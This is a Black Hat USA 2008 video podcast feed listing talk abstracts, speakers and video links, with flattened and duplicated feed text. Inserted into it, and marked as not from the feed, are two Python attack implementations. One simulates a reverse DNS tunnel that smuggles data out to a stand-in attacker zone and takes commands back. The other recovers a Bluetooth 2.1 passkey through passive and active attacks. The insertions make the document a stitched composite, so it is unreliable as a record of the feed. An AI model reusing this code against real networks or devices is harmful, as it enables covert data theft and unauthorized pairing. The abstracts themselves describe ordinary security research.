to a WiFi network. 
This paper describes numerous techniques for attacking Clients-side technologies. The content of the paper is based on the research that has been conducted over the past year by the GNUCITIZEN Ethical Hacker Outfit. If Apple responds before the event, I will drop the details of a QuickTime 0day for Windows Vista and XP. 01:11:35 Black Hat, Petko D. Petkov,Client-Side Security feedback@blackhat.com no Black Hat USA 2008: Steve Pate - Playing by Virtual Security Rules: How Virtualization Changes Everything and What to Do about It Virtualization completely changes the risk to information theft. Traditional physical security systems become ineffective, disk encryption no longer protects the operating system, and sensitive data becomes more portable than ever before. This talk will cover the security risks of virtualized environments, common hacking techniques, how virtualization effects traditional security practices, and presents a new model for securing virtualized environments. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Pate feedback@blackhat.com Computer 0E3CAC06-57FE-485C-AF4B-82F9CDAC1B9B-51585-00031D1A151D99B2-FFA Mon, 16 Mar 2009 18:39:50 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Pate/black-hat-usa-08-pate-virtualsecurityrules-hires.m4v Black Hat USA 2008: Steve Pate - Playing by Virtual Security Rules: How Virtualization Changes Everything and What to Do about It Virtualization completely changes the risk to information theft. Traditional physical security systems become ineffective, disk encryption no longer protects the operating system, and sensitive data becomes more portable than ever before. This talk will cover the security risks of virtualized environments, common hacking techniques, how virtualization effects traditional security practices, and presents a new model for securing virtualized environments. 
00:13:51 Black Hat, Steve Pate, Virtual Security, Virtualization feedback@blackhat.com no Black Hat USA 2008: Michael Ossmann - Software Radio and the Future of Wireless Security <br /> Radios are everywhere. We use them daily in car stereos, cordless phones, car key fobs, proximity access cards, laptops, television tuners, garage door openers, mobile phones, and headsets, to name a few. To build one of these radio devices in the traditional manner, you would need some electronic components (including, in many cases, a microprocessor), a soldering iron, and a fairly advanced knowledge of electronic circuit design. All that is changing, however, with the emergence of software radio. The digital technologies that revolutionized the audio world over last thirty years are now bringing the same revolution to the radio world. General purpose computers are becoming fast enough to function as sophisticated radio devices with minimal hardware peripherals. In the future, all radios will be software radios, and all practical wireless security tools will be implemented with software radio.<br /> <br /> This presentation will describe the state of software radio, discuss future trends, and point out current and future applications of software radio technologies to wireless security research. Particular attention will be given to tools and resources that are available today, helping attendees without a background in RF technology to get started in the field. Practical attacks will be demonstrated using GNU Radio and the Universal Software Radio Peripheral. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Ossmann feedback@blackhat.com Computer 0E9477FD-2B06-4EA2-B63C-03BB14CD2B43-51585-00031CF49A813DD7-FFA Mon, 16 Mar 2009 17:58:02 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Ossman/black-hat-usa-08-ossmann-softwareradio-hires.m4v Black Hat USA 2008: Michael Ossmann - Software Radio and the Future of Wireless Security Radios are everywhere. 
We use them daily in car stereos, cordless phones, car key fobs, proximity access cards, laptops, television tuners, garage door openers, mobile phones, and headsets, to name a few. To build one of these radio devices in the traditional manner, you would need some electronic components (including, in many cases, a microprocessor), a soldering iron, and a fairly advanced knowledge of electronic circuit design. All that is changing, however, with the emergence of software radio. The digital technologies that revolutionized the audio world over last thirty years are now bringing the same revolution to the radio world. General purpose computers are becoming fast enough to function as sophisticated radio devices with minimal hardware peripherals. In the future, all radios will be software radios, and all practical wireless security tools will be implemented with software radio. This presentation will describe the state of software radio, discuss future trends, and point out current and future applications of software radio technologies to wireless security research. Particular attention will be given to tools and resources that are available today, helping attendees without a background in RF technology to get started in the field. Practical attacks will be demonstrated using GNU Radio and the Universal Software Radio Peripheral. 01:12:27 Black Hat, Michael Ossmann, Software Radio, Wireless Security feedback@blackhat.com no Black Hat USA 2008: OlleB - Mobitex Network Security This talk will give an overview of the Mobitex wireless networking technology and infrastructure (www.mobitex.org). A detailed presentation of the authentication (subscriber identity) and privacy (anti-sniffing) features will be presented and fundamental weaknesses in both will be presented along with suggested improvements and "best practice" advice for implementors of applications built on Mobitex and other wide-area coverage wireless network standards. 
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#OlleB
Published: Mon, 16 Mar 2009 17:55:21 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-OlleB/black-hat-usa-08-olleb-mobitex-hires.m4v

Black Hat USA 2008: OlleB - Mobitex Network Security
This talk will give an overview of the Mobitex wireless networking technology and infrastructure (www.mobitex.org). A detailed presentation of the authentication (subscriber identity) and privacy (anti-sniffing) features will be presented, and fundamental weaknesses in both will be presented along with suggested improvements and "best practice" advice for implementors of applications built on Mobitex and other wide-area coverage wireless network standards.
Running time: 00:47:46. Tags: Black Hat, OlleB, Mobitex

Black Hat USA 2008: Justine Osborne, Alex Stamos - Living in the RIA World: Blurring the Line Between Web and Desktop Security
Rich Internet Applications (RIA) represent the next generation of the Web. Designed to run without constant Internet connectivity, they provide a graphical experience equivalent to thick desktop applications with the easy install experience of thin Web apps. They intentionally blur the line between websites and traditional desktop applications and greatly complicate the jobs of web developers, corporate security teams, and external security professionals.

Our goal with this talk will be to outline the different attack scenarios that exist in the RIA world and to provide a comparison between the security models of the leading RIA platforms. We will discuss how current attacks against web applications are changed with RIA as well as outline new types of vulnerabilities that are unique to this paradigm. Attendees will learn how to analyze the threat posed to them by RIA applications as either providers or consumers of software built on these new platforms.

We will also be discussing the attack surface exposed by the large media codec stacks contained in each of these platforms. Our targeted platforms include Adobe AIR, Microsoft Silverlight, Google Gears, JavaFX, and Mozilla Prism. At this talk, we will be releasing tools for testing the codec security of these platforms as well as sample malicious code demonstrating the danger of RIA applications.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Stamos
Published: Mon, 16 Mar 2009 17:52:07 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Stamos/black-hat-usa-08-stamos-RIAworld-hires.m4v
Running time: 01:14:43. Tags: Black Hat, Justine Osborne, Alex Stamos, RIA Security

Black Hat USA 2008: Karsten Nohl - Mifare -- Little Security, Despite Obscurity
Radio Frequency Identification (RFID) tags are becoming ubiquitous and can already be found in touch-less entry systems, all major credit cards, most car keys, and many ticketing systems. Mifare is the most widely deployed brand of cryptographic RFID tags, and their security relies on proprietary security, in spite of the well known fact that security-through-obscurity does not work.

We find the secret algorithms from Mifare tags by using a combination of image analysis of circuits and protocol analysis. In this process, we open silicon chips, take pictures under a microscope, employ and adapt computer vision algorithms, design and build radio equipment, simulate circuits, and finally use cryptanalysis to assess the security of the discovered algorithms. Our project is the first non-classified work to provide a methodology for hardware reverse-engineering and corrects the belief that this process is necessarily expensive.

Our analysis of the widely used Mifare RFID tags reveals that their actual security is well below the claimed security level due to a number of design flaws. The security of the analyzed tag is clearly insufficient for many of its applications. Consequently, ever since news of our results first surfaced, several current deployments of the tags have been brought under public scrutiny.
Most notably, a nationwide ticket system for public transport in the Netherlands must now be re-engineered. During a parliamentary discussion on this subject, politicians have called for proprietary technology to be avoided in favor of open designs.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Nohl
Published: Mon, 16 Mar 2009 17:48:04 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Nohl/black-hat-usa-08-nohl-MIFARE-hires.m4v
Running time: 00:46:34. Tags: Black Hat, Karsten Nohl, Mifare

Black Hat USA 2008: Junichi Murakami - A Hypervisor IPS based on Hardware Assisted Virtualization Technology
Recently malware has become more stealthy, and thus harder to detect, than ever before. Current malware uses many stealth techniques, such as dynamic code injection, rootkit technology and much more. Moreover, we have seen full kernel mode malware like Trojan.Srizbi.

Many detection tools were released that specialize in kernel mode malware and especially in the detection of rootkits. However, these tools are a cat and mouse game, because they and the malware are executed on the same privilege level.

This is why we developed an IPS based on a hypervisor, which uses features of hardware virtualization. It is executed in Ring -1 and thus runs with higher privileges than the OS layer.

In this session, we will talk about stealth mechanisms used by recent malware and demonstrate how to protect against such malware using Hypervisor IPS.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Murakami
Published: Mon, 16 Mar 2009 17:35:57 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Murakami/black-hat-usa-08-murakami-hypervisorIPS-hires.m4v
Running time: 00:54:52. Tags: Black Hat, Junichi Murakami, Hypervisor, IPS, Virtualization

Black Hat USA 2008: Ariel Futoransky - Viral Infections in Cisco IOS
Rootkits are very common in most popular Operating Systems like Windows, Linux, Unix and any variant of those, but they are rarely seen in embedded OSes.

This is due to the fact that most of the time embedded OSes are closed source, hence the internals of the OS are unknown and the reverse engineering process is harder than usual. In real life, it's very common that once an attacker takes control of a system he or she needs to maintain access to it, so a rootkit is installed.

The rootkit seizes control of the entire system running on that hardware by hiding files, processes, network connections, allowing unauthorized users to act as system administrators, etc.

This paper demonstrates that a rootkit with those characteristics can be easily created and deployed for a closed source OS like IOS and run unnoticed by system administrators by surviving most, if not all, of the security measures given by experts in the field.

As a proof of this, different ways to infect a target IOS will be shown, like run-time patching and image binary patching. To discuss the binary patching technique from a practical point of view, a set of python scripts that provides the methods to insert a generic rootkit implementation called DIK (Da Ios rootKit) will be introduced; it's done in plain C for IOS. Also other techniques like run-time image infection will be discussed in detail.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Futoransky
Published: Mon, 16 Mar 2009 17:30:10 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Futoransky/black-hat-usa-08-futoransky-viralCisco-hires.m4v
Running time: 01:01:27. Tags: Black Hat, Ariel Futoransky, Viral Infections, Cisco IOS

Black Hat USA 2008: Shawn Moyer and Nathan Hamiel - Satan is on My Friends List: Attacking Social Networks
Social Networking is shaping up to be the perfect storm: an implicit trust of those in one's network or social circle, a willingness to share information, little or no validation of identity, the ability to run arbitrary code (in the case of user-created apps) with minimal review, and a tag soup of client-side user-generated HTML. Yikes.

But enough about pwning the kid from homeroom who copied your calc homework. With the rise of business social networking sites, there are now thousands of public profiles with real names and titles of people working for major banks, the defense and aerospace industry, federal agencies, the US Senate... A target-rich and trusting environment for custom-tailored, laser-focused attacks.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Moyer
Published: Mon, 16 Mar 2009 17:25:49 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Moyer/black-hat-usa-08-moyer-socialnetworks-hires.m4v
Running time: 00:52:16. Tags: Black Hat, Shawn Moyer, Nathan Hamiel, Social Networks

Black Hat USA 2008: Ty Miller - Reverse DNS Tunneling Shellcode
Remote exploitation of client-side vulnerabilities is falling short due to the shellcode often failing to connect back to the attacker. The creation of "Reverse DNS Tunneling Shellcode" will allow client-side exploits to be much more effective by using DNS as a tunneling protocol. This increases the success rate of client-side exploitation attempts by using this more stable tunneling technique.

The number of vulnerabilities found within external systems and services is decreasing, making it less likely to directly exploit externally accessible systems to gain access to an internal network. Thankfully for Hackers and Penetration Testers, client-side vulnerabilities are still rampant, such as in web browsers, plugins, local software and operating systems. This has increased interest in creating and using exploits for client-side vulnerabilities. It is quite common for an exploit to be successful, however, and still fail to connect back to the attacker due to firewalls preventing direct outbound connections, HTTP tunneling failing to detect, connect or authenticate out via proxies, or complexities in hijacking established connections, if they exist.

Reverse DNS Tunneling shellcode is a new technique for shellcode that increases the success rate of client-side exploit attempts by using the DNS protocol. DNS provides a number of advantages over other protocols. Most remote exploitation attempts of client-side vulnerabilities aim to attack workstations. Workstations are almost always pre-configured to use an internal DNS server, which we can use to tunnel our connection out. DNS also does not require authentication, whereas HTTP tunneling does, which means that DNS has fewer barriers to bypass in order to escape the internal network. This is important since it means that the chance of successful exploitation is much higher when using Reverse DNS Tunneling Shellcode.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Miller
Published: Mon, 16 Mar 2009 17:20:20 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Miller/black-hat-usa-08-miller-reverseDNS-hires.m4v
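The abstract above explains why DNS makes a good covert channel (the workstation already trusts an internal recursive resolver, and no proxy authentication is needed) but not how data actually rides in DNS. The following Python simulation is an added example, not Ty Miller's shellcode or anything from this feed. It packs outbound data into query names under an attacker-controlled zone (tun.example.net is a hypothetical name) while respecting the 63-byte label and 253-byte name limits, reassembles them on the attacker's authoritative side even when queries arrive out of order or are retried, and returns a command in a TXT answer. The internal resolver is modelled as a function that simply recurses for the attacker's zone; no packets are sent.

```python
"""Reverse DNS tunnelling, simulated end to end without any network I/O.

Upstream:   implant -> internal resolver -> attacker's authoritative server
            (data is base32-encoded into the labels of a query name)
Downstream: authoritative server answers with a TXT record carrying a command
"""
import base64
import struct
from typing import Dict, List

ZONE = "tun.example.net"      # assumed attacker-controlled zone (hypothetical)
LABEL_MAX = 63                # RFC 1035 label limit
NAME_MAX = 253                # practical limit for a textual domain name
RAW_PER_LABEL = 35            # 35 raw bytes -> 56 base32 chars (fits in a label)
HDR = struct.Struct(">HHB")   # per-query header: session id, sequence no, last flag


def b32(data: bytes) -> str:
    # Base32 without padding, lower-cased: labels are case-insensitive and
    # base32 avoids characters that are illegal in hostnames.
    return base64.b32encode(data).decode().rstrip("=").lower()


def unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_upstream(data: bytes, session: int, zone: str = ZONE) -> List[str]:
    """Split `data` into query names of the form <hdr>.<chunk>...<chunk>.<zone>."""
    hdr_len = len(b32(HDR.pack(0, 0, 0)))             # 8 characters
    label_w = len(b32(b"\0" * RAW_PER_LABEL)) + 1     # 56 characters plus a dot
    labels_per_name = (NAME_MAX - len(zone) - hdr_len - 1) // label_w
    if labels_per_name < 1:
        raise ValueError("zone too long to carry any payload")
    raw_per_name = labels_per_name * RAW_PER_LABEL
    chunks = [data[i:i + raw_per_name] for i in range(0, len(data), raw_per_name)] or [b""]
    names = []
    for seq, chunk in enumerate(chunks):
        last = 1 if seq == len(chunks) - 1 else 0
        # The sequence number also makes every name unique, which defeats
        # caching on the recursive resolver in between.
        labels = [b32(HDR.pack(session, seq, last))]
        labels += [b32(chunk[i:i + RAW_PER_LABEL]) for i in range(0, len(chunk), RAW_PER_LABEL)]
        name = ".".join(labels + [zone])
        assert len(name) <= NAME_MAX and all(len(lab) <= LABEL_MAX for lab in labels)
        names.append(name)
    return names


def decode_upstream(names: List[str], zone: str = ZONE) -> Dict[int, bytes]:
    """Reassemble data per session from observed query names (any order, duplicates ok).

    Only sessions whose last chunk and every earlier chunk were seen are returned."""
    sessions: Dict[int, Dict[int, bytes]] = {}
    last_seq: Dict[int, int] = {}
    for name in names:
        if not name.endswith("." + zone):
            continue                                   # not ours; ignore
        labels = name[: -len(zone) - 1].split(".")
        session, seq, last = HDR.unpack(unb32(labels[0]))
        sessions.setdefault(session, {})[seq] = b"".join(unb32(lab) for lab in labels[1:])
        if last:
            last_seq[session] = seq
    out: Dict[int, bytes] = {}
    for session, chunks in sessions.items():
        if session in last_seq and all(i in chunks for i in range(last_seq[session] + 1)):
            out[session] = b"".join(chunks[i] for i in range(last_seq[session] + 1))
    return out


def downstream_txt(command: bytes) -> str:
    """Attacker's answer: the command as one TXT character-string (max 255 bytes)."""
    txt = base64.b64encode(command).decode()
    if len(txt) > 255:
        raise ValueError("command too long for a single TXT string")
    return txt


def simulate(data: bytes, session: int, command: bytes):
    """One round trip: implant -> internal resolver -> authoritative server -> back."""
    seen_by_attacker: List[str] = []

    def authoritative(qname: str) -> str:      # attacker's name server for ZONE
        seen_by_attacker.append(qname)
        return downstream_txt(command)

    def internal_resolver(qname: str):         # corporate resolver: no auth, just recursion
        return authoritative(qname) if qname.endswith("." + ZONE) else None

    replies = [internal_resolver(q) for q in encode_upstream(data, session)]
    recovered = decode_upstream(seen_by_attacker)[session]
    received_command = base64.b64decode(replies[-1])
    return recovered, received_command
```

With this layout a 15-character zone gives four 35-byte labels per query, so 140 bytes of upstream data per lookup; the defensive corollary is that the channel is visible as a burst of long, high-entropy, never-repeating names toward a single zone, which is what a resolver-log detection should key on.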
Running time: 01:19:50. Tags: Black Hat, Ty Miller, DNS, Reverse DNS, Tunneling, Shellcode, HTTP Tunneling

Black Hat USA 2008: Meet the Feds
Join some of the longest running cybercops in a reality session not made for TV. Hang out on the front lines to learn about the most sophisticated attacks happening so far this year. We don't expect to win an Emmy, but we might get a Pwnie. This year we will have so many feds representing their federal agencies that we will break it up into two separate panels, an hour each:

IA Panel: Information assurance, CERTs, first responders' organizations from agencies

LE Panel: Law enforcement, counterintelligence agencies

Each of the agency reps makes an opening statement regarding their agency's role, then opens it up to the audience for questions.
Agencies that will have representatives include: Defense Cyber Crime Center (DC3), FBI, IRS, NCIS, NASA, DHS USCERT, DoJ, National White Collar Crime Center (NWC3), NSA, US Postal IG, Office of the Secretary of Defense, National Defense University.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Meet
Published: Mon, 16 Mar 2009 17:04:52 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Meet-The-Feds/black-hat-usa-08-meetthefeds-hires.m4v
Running time: 01:15:16. Tags: Black Hat, Meet the Feds

Black Hat USA 2008: Haroon Meer - Pushing the Camel through the Eye of a Needle
In 2007 SensePost demonstrated how DNS and Timing attacks could be used for a variety of attacks. This year we take those attacks further and show how small footholds in a target network can be converted into portals we can (and do) drive trucks through!

With some updated SensePost tools, and some brand new ones, we will demonstrate how to convert your simple SQL Injection attacks (against well hardened environments) into point and click (well, type and click) ownage, how the framework management pages you never knew you had can double as our network proxies, and why, despite all of the hype around SQL Server 2005, we still enjoy finding it behind vulnerable web applications. The talk is fairly technical and expects that the attendees understand the basics of Web Application and Web Browser based attacks. Attendees will leave with new attack vectors, a couple of new tools and some thoughts on future directions of these attacks.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Meer
Published: Mon, 16 Mar 2009 17:00:14 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Meer/black-hat-usa-08-meer-camel-needle-hires.m4v
Running time: 01:17:23. Tags: Black Hat, Haroon Meer, SensePost

Black Hat USA 2008: Patrick McGregor - Braving the Cold: New Methods for Preventing Cold Boot Attacks on Encryption Keys
We can prevent Cold Boot attacks. We present a new set of software-driven techniques for protecting cryptographic keys in various encryption systems. These software techniques do not involve the use of any specialized hardware or encryption chips. Instead, the techniques utilize specialized cryptographic transformations, memory system and operating system operations, and certain architectural features of general-purpose processors such as Pentiums. The methods can defend against Cold Boot attacks on machines that have been shut off, on machines in hibernate and sleep modes, and even on machines in screen lock mode.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#McGregor
Published: Mon, 16 Mar 2009 16:57:11 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Mcgregor/black-hat-usa-08-mcgregor-coldboot-hires.m4v
Running time: 01:15:08. Tags: Black Hat, Patrick McGregor, Cold Boot Attacks, Encryption Keys

Black Hat USA 2008: Nathan McFeters - The Internet is Broken: Beyond Document.Cookie - Extreme Client Side Exploitation
The dangers of client-side threats such as XSS and CSRF are well understood in the context of vulnerable web applications. Furthermore, the dangers of malicious script as a vehicle for exploiting browser flaws and reconnoitering the Intranet have been discussed at length. Now what if XSS and CSRF could be leveraged directly to compromise the host... by design?

Rewind a few years ago and the client-side landscape was somewhat different: research was focused on exploiting the complex interactions between components exposed by the browser. The security of the whole was defined as the sum of the weaknesses of the parts, namely JavaScript, Java, Flash, and anything accessible via a protocol handler. These types of attack gave way to direct browser flaws... after all, why carry out a multi-stage attack when you could trigger straight code execution? Fast forward to 2008: browser flaws are not going away in the foreseeable future but they are on the decline, and in a world of stack cookies, non-executable stacks and ASLR they are becoming increasingly hard to exploit. Which takes us back to the complexity issues. They never went away. In fact the situation has gotten worse, spurred by the development of offline solutions such as Google Gears and Adobe AIR, the plethora of protocol handlers and an explosion of browser helper objects.

This double session presentation combines the research of four notable Black Hat presenters who have previously discussed client side exploitation from browser to rootkit. Combined with a rapidly increasing corporate interest in "outsourcing" applications to the browser, this fast-paced, entertaining, and novel presentation answers the question: should we really be building next generation applications on the shaky foundations of the browser?

This is NOT another talk focused on XSS or CSRF; it's about issues and vulnerability classes that have not been discussed anywhere else. You get all of this from some legit, good looking security researchers; what more could you ask for?
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#McFeters
Published: Mon, 16 Mar 2009 16:54:05 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-McFeters/black-hat-usa-08-mcfeters-beyonddocument.cookie-hires.m4v
Running time: 01:10:14. Tags: Black Hat, Nathan McFeters, Document.Cookie, Client Side Exploitation

Black Hat USA 2008: Felix Lindner - Developments in Cisco IOS Forensics
Attacks on network infrastructure are not a new field. However, the increasing default protections in common operating systems, platforms and development environments increase interest in the less protected infrastructure sector. Today, performing in-depth crash analysis or digital forensics is almost impossible on the most widely used routing platform.

This talk will show new developments in this sector and how a slightly adjusted network infrastructure configuration together with new tools finally allows us to separate crashed, attacked and backdoored routers from each other.
We walk through the known types of backdoors and shellcodes for IOS as well as their detection and the challenges in doing so.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Lindner
Published: Mon, 16 Mar 2009 16:50:32 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Lindner/black-hat-usa-08-lindner-iOSforensics-hires.m4v
Running time: 00:49:15. Tags: Black Hat, Felix Lindner, Cisco IOS, Forensics

Black Hat USA 2008: Andrew Lindell - Bluetooth v2.1 - a New Security Infrastructure and New Vulnerabilities
The Bluetooth protocol for close-range wireless communication has been a huge success. It is a widely adopted standard and is used for a wide range of devices, from cellphones to PDAs to laptops and more. Due to its ubiquity and importance, its security has become a critical issue. In the new version 2.1 released in July 2007, a complete overhaul of the pairing procedure was carried out with the express aim of making it more secure. In this paper we show that the Bluetooth pairing protocol in passkey entry mode completely leaks the password. In addition, we show that it is possible to pair with a device that uses a fixed (but unknown) password, even when the password is random and reasonably long. Our attacks demonstrate that passkey entry mode can only be used with a different random password each time. Unfortunately this is not possible for devices that use a fixed password (like many hands-free car kits). In addition, due to human behavior, this is unlikely to be the case when the user enters the password into two devices in order to pair them. Thus, devices that leave it to the user to enter a password (instead of randomly generating it on one of the devices) will be vulnerable to attack.
Speaker page: http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Lindell
Published: Mon, 16 Mar 2009 16:47:26 -0700
Video (hi-res .m4v): https://media.blackhat.com/bh-usa-08/video/bh-us-08-Lindell/black-hat-usa-08-lindell-bluetoothv21-hires.m4v
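Lindell's abstract states the two results but not the mechanism behind them. The Python below is an added example, not Lindell's code or anything from this feed, and it models the Passkey Entry stage of Secure Simple Pairing at the level needed to see the leak: the 20-bit (6-digit) passkey is committed to one bit per round, and each round's commitment is f1 modelled as HMAC-SHA-256 keyed with the round nonce over the two public keys and Z = 0x80 | bit. The public keys are replaced by constructed byte strings because the ECDH exchange plays no part in the leak. It shows the passive attack (once a side reveals its nonce, an eavesdropper needs only two guesses to open that round's commitment and recover the bit) and the active attack against a fixed passkey (an attacker posing as the responder cannot commit correctly to a bit it does not yet know, so each failed pairing attempt still teaches it one more bit).

```python
"""Why SSP Passkey Entry leaks the passkey: one bit per commitment round.

Simplified model of the Bluetooth 2.1 passkey entry stage (added example).
f1 is modelled after the spec's HMAC-SHA-256 commitment; PKA/PKB are stand-ins
for the ECDH public keys, which do not matter for the attack.
"""
import hashlib
import hmac
import secrets
from typing import Callable, List, Tuple

ROUNDS = 20                      # a 6-digit decimal passkey fits in 20 bits
PKA = b"\x01" * 24               # constructed stand-in for A's public key
PKB = b"\x02" * 24               # constructed stand-in for B's public key


def f1(u: bytes, v: bytes, x: bytes, z: bytes) -> bytes:
    """Commitment to passkey bit byte z under nonce x (truncated to 128 bits)."""
    return hmac.new(x, u + v + z, hashlib.sha256).digest()[:16]


def passkey_bits(passkey: int) -> List[int]:
    return [(passkey >> i) & 1 for i in range(ROUNDS)]     # LSB first


def bits_to_passkey(bits: List[int]) -> int:
    return sum(b << i for i, b in enumerate(bits))


def open_commitment(u: bytes, v: bytes, nonce: bytes, commitment: bytes) -> int:
    """Z is 0x80|bit, so a revealed nonce leaves only two candidates to test."""
    for bit in (0, 1):
        if f1(u, v, nonce, bytes([0x80 | bit])) == commitment:
            return bit
    raise ValueError("commitment does not open under either bit")


def run_pairing(passkey: int, rng: Callable[[int], bytes] = secrets.token_bytes) -> List[Tuple[bytes, bytes, bytes, bytes]]:
    """Honest A and B run the 20 rounds; return what a passive eavesdropper sees."""
    transcript = []
    for bit in passkey_bits(passkey):
        z = bytes([0x80 | bit])
        na, nb = rng(16), rng(16)
        ca = f1(PKA, PKB, na, z)          # A commits first, then B
        cb = f1(PKB, PKA, nb, z)
        # A reveals Na and B checks Ca; B reveals Nb and A checks Cb.
        if f1(PKA, PKB, na, z) != ca or f1(PKB, PKA, nb, z) != cb:
            raise ValueError("honest check failed")    # cannot happen here
        transcript.append((ca, cb, na, nb))
    return transcript


def eavesdrop(transcript) -> int:
    """Passive attack: open each round's Ca with the revealed Na."""
    return bits_to_passkey([open_commitment(PKA, PKB, na, ca) for ca, _cb, na, _nb in transcript])


class Initiator:
    """Device A with a fixed passkey (e.g. a car kit); aborts on a bad commitment."""

    def __init__(self, passkey: int, rng: Callable[[int], bytes] = secrets.token_bytes):
        self.bits, self.rng = passkey_bits(passkey), rng

    def pair(self, responder) -> bool:
        for i, bit in enumerate(self.bits):
            z = bytes([0x80 | bit])
            na = self.rng(16)
            cb = responder.commit(i, f1(PKA, PKB, na, z))   # A commits, B answers
            nb = responder.reveal(i, na)                    # A opens, then B opens
            if f1(PKB, PKA, nb, z) != cb:
                return False                                # B's commitment was wrong
        return True


class Attacker:
    """Poses as B: replays bits already learned, guesses the next one, learns it from Na."""

    def __init__(self):
        self.known: List[int] = []

    def commit(self, i: int, ca: bytes) -> bytes:
        self.ca, self.nb = ca, secrets.token_bytes(16)
        guess = self.known[i] if i < len(self.known) else 0
        return f1(PKB, PKA, self.nb, bytes([0x80 | guess]))

    def reveal(self, i: int, na: bytes) -> bytes:
        bit = open_commitment(PKA, PKB, na, self.ca)        # exact bit i, whatever we guessed
        if i == len(self.known):
            self.known.append(bit)
        return self.nb


def active_attack(victim_passkey: int, max_attempts: int = ROUNDS + 1):
    """Repeat pairing attempts against a fixed-passkey device until one succeeds.

    Returns (attempts used, recovered passkey); every wrong guess costs one attempt."""
    victim, attacker = Initiator(victim_passkey), Attacker()
    for attempt in range(1, max_attempts + 1):
        if victim.pair(attacker):
            return attempt, bits_to_passkey(attacker.known)
    return None
```

The active attack needs at most one failed attempt per 1-bit of the passkey plus the final successful one, which is why the abstract's conclusion follows: only a passkey that is freshly random for every pairing denies the attacker the carry-over of bits learned in earlier attempts, and a device with a fixed or user-chosen passkey cannot provide that.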
In addition, due to human behavior, this is unlikely to be the case when the user enters the password into two devices in order to pair them. Thus, devices who leave it to the user to enter a password (instead of randomly generating it on one of the devices) will be vulnerable to attack. 01:08:25 Black Hat, Andrew Lindell,Bluetooth v2.1 feedback@blackhat.com no Black Hat USA 2008: Nate Lawson - Highway to Hell: Hacking Toll Systems Toll payment systems, such as FasTrak and E-ZPass, promise quick travel and more revenue for the state. While privacy issues with such systems have been discussed in general, little is known about their actual implementation and security. We reverse-engineered the RFID internals and analyzed the protocol to find out just what's going on inside. We'll explain the low-level details we found, problems, and possible ways to build a more safe and secure system http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Lawson feedback@blackhat.com Computer 005B9A2C-9049-4D0B-84E8-57497AC1BF32-51585-000318E72FEB97AF-FFA Mon, 16 Mar 2009 16:43:55 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Lawson/black-hat-usa-08-lawson-hackingtollsystems-hires.m4v Black Hat USA 2008: Nate Lawson - Highway to Hell: Hacking Toll Systems Toll payment systems, such as FasTrak and E-ZPass, promise quick travel and more revenue for the state. While privacy issues with such systems have been discussed in general, little is known about their actual implementation and security. We reverse-engineered the RFID internals and analyzed the protocol to find out just what's going on inside. 
We'll explain the low-level details we found, problems, and possible ways to build a more safe and secure system 00:45:29 Black Hat,Nate Lawson,Hacking Toll Systems feedback@blackhat.com no Black Hat USA 2008: Eric Laspe - Deobfuscator: an Automated Approach to the Identification and Removal of Code Obfuscation <br /> The Deobfuscator is an IDA Pro plug-in that neutralizes anti-disassembly code and transforms obfuscated code to simplified code in the actual binary. This plug-in uses emulation techniques to remove obfuscated code and replace it with a simplified, transformed equivalent. It can be used alone to modify an IDA Pro database for static analysis, or in conjunction with a binary injector to ease dynamic analysis.<br /> <br /> We developed this tool in assessing strengths of protections and malware analysis for DoD government entities and commercial companies. Since its inception, the Deobfuscator has proven to reduce analysis tasks that previously took days into ones that take mere minutes. http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Laspe feedback@blackhat.com Computer 4A58EE58-870F-4BEE-9AFF-D5D0A387E00A-51585-000318B4981E91E1-FFA Mon, 16 Mar 2009 16:40:58 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Laspe/black-hat-usa-08-laspe-deobfuscator-hires.m4v Black Hat USA 2008: Eric Laspe - Deobfuscator: an Automated Approach to the Identification and Removal of Code Obfuscation The Deobfuscator is an IDA Pro plug-in that neutralizes anti-disassembly code and transforms obfuscated code to simplified code in the actual binary. This plug-in uses emulation techniques to remove obfuscated code and replace it with a simplified, transformed equivalent. It can be used alone to modify an IDA Pro database for static analysis, or in conjunction with a binary injector to ease dynamic analysis. We developed this tool in assessing strengths of protections and malware analysis for DoD government entities and commercial companies. 
